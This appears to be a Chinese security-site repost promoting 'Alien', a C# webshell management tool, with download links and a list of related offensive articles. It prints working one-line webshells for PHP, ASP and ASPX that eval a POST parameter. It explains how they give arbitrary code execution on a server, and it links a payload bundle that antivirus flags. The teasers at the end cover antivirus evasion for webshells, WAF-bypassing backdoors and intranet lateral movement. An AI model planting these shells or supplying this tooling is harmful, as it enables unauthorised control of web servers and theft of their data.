一款新的webshell管理工具

VSole2023-09-25 10:22:42

Alien

项目简介

语言

C# .NET Framework V4.8

功能

  • File Manager (可显示图片, 可SearchFile)
  • 虚拟终端
  • 数据库
  • 注册表
  • 监控
  • 截图
  • 系统信息

项目描述

一句话木马

一句话木马是在渗透测试中用来控制服务器的工具

强大之处在于木马本身体积小,不易发现

以下是最简单的一句话木马

PHP <?php @eval($_POST['password']);?>ASP <%execute(request("password"))%>ASPX <%@ Page Language="Jscript"%><%eval(Request.Item["password"])%>当然, Alien还可以使用asmx, ashx等等的Webshell。NodeJS和JSP https://github.com/malbuffer4pt/Alien/blob/main/shell.txt

关于JSP webshell

目前只有比较原始的菜刀版本, 之后可能会加上蚁剑和冰蝎

shell有进行更改, 新增了可以显示图片的功能

关于NodeJS webshell

由于NodeJS特性, 原理跟一般php asp aspx等动态语言的shell不同, 

NodeJS目的重在管理而非渗透

伺服器

Windows, Linux, Unix, MacOS

Database管理

MySQL :PHP

交通 :https://github.com/malbuffer4pt/DBer

SQL Server :ASP ASPX ASMX ASHX

原理

以PHP为例子, eval()可以把string以PHP Code去执行,

如果eval()中带有可控变量,那么就可以执行任意代码。 

如eval($_POST['a']);

HTTP POST a=phpinfo(); 就可以执行phpinfo();

注意!

  • 工具Payloads文件夹内有符合恶意程序的Payload, 可能会被防毒删除
  • 目前只有删减版,但部份代码没有删除,Disassemble应该会有奇怪但无法使用的东西

图片

项目地址:

https://github.com/malbuffer4pt/Alien

网盘下载地址:

链接:https://pan.quark.cn/s/a3270016801d

编程语言webshell
本作品采用《CC 协议》,转载必须注明作者和本文链接
前言提到webshell免杀,方法无外乎对静态特征的变形,编码,或利用语言特性绕过。计算机中有很多符号,它们在编程语言中占据一席之地,这些符号作为运算符号,标识符号或起到特殊含义。本文以PHP为例介绍一些利用符号免杀方法。免杀WAF检测通过对安全狗、护卫神、D盾等常见软WAF的测试,发现WAF查杀主要依赖两种检测方法1.静态检测:通过匹配特征来查找webshell。如危险函数,文件特征码等。例如 ${$my_var[8]}与${$my_var}[8]的区分${xxx} 括起来的要当成变量处理。
Webshell 检测综述
2022-12-15 09:45:32
通过Webshell,攻击者可以在目标服务器上执行一些命令从而完成信息嗅探、数据窃取或篡改等非法操作,对Web服务器造成巨大危害。Webshell恶意软件是一种长期存在的普遍威胁,能够绕过很多安全工具的检测。许多研究人员在Webshell检测领域进行了深入研究,并提出了一些卓有成效的方法。本文以PHP Webshell为例。
0x01 工具介绍Gel4y Webshell 是一个使用 PHP 编程语言构建的后门,采用 PHP 程序方法在隐身模式下,文件大小不会超过 15KB。每个功能都被转换为十六进制代码,以允许此 webshell 穿透 WAF(防火墙)服务器系统。主要功能:多文件上传、创建文件夹和文件,文件,可绕过403禁止,406不可接受,免疫360。
验证子域邮箱名Invoke-DomainHarvestOWA-ExchHostname -Domain -UserList .\userName.txt -OutFile sprayed-ews-creds.txt. Office 365近源渗透物理渗透、物理攻击、近源渗透,这几个的意思都是在接近目标进行安全测试。Wi-Fi网线没有终端准入控制,直接插网线 DHCP 获取 IP。Bad USBBlack Hat 上提出 Bad USB。社会工程学在信息收集过程中就开始。钓鱼本质是利用人的信任。Windows 主机FTP服务端开启 FTP 服务。使用 certutil 下载的文件会原封不动在?目录下保存一份,文件名位随机字符,使用 delete 可以删除刚下载的缓存。
0x01 前言 之前偶尔会遇到站库分离数据库不出网&没有Webshell的情况,只有一个可以执行命令的shell,这种情况下如果想进行横向只能通过数据库来落地我们的工具。 注:文中只是为了演示数据库如何落地exe,可能部分环境过于理想化,在实战中很难遇到。 0x02 模拟环境 模拟环境:Windows+Mysql 5.7.26,web目录没有写入权限,但是对lib/plugin有写入权限,
随着互联网的迅速发展,网络安全问题日益严峻。黑客攻击和网络漏洞成为让人头痛的问题。为了保护自己的网络安全,安全专家不仅需要了解网络安全原理,还需要熟悉网络渗透工具的使用。Python作为一种简单易学且功能强大的编程语言,被广泛应用于网络安全领域。本文将推荐python渗透工具。
随着企业云原生化进程的推进,系统架构也开始从传统架构向微服务架构转型。服务之间的API调用也从RESTful接口转向gRPC、GraphQL等新型的更高效的协议接口。新技术带来便利的同时,也为内存马攻击技术带来了新的攻击面。
概述渗透测试的目标可以是单个主机,也可以是整个内网。在实战中,比如最近如火如荼的HW行动,更多的是对一个目标的内网进行渗透,争取获得所有有价值的资产。完整的内网渗透涉及的步骤如下图所示。快速横向移动到到内网中的核心资产,获取核心敏感数据和权限,完成一次疼痛的打击。Step 1 信息收集完成边界突破的第一步是目标对象资产的信息收集。这些其实是为了找到脆弱资产进行攻击,毕竟“柿子挑软的捏”。
VSole
网络安全专家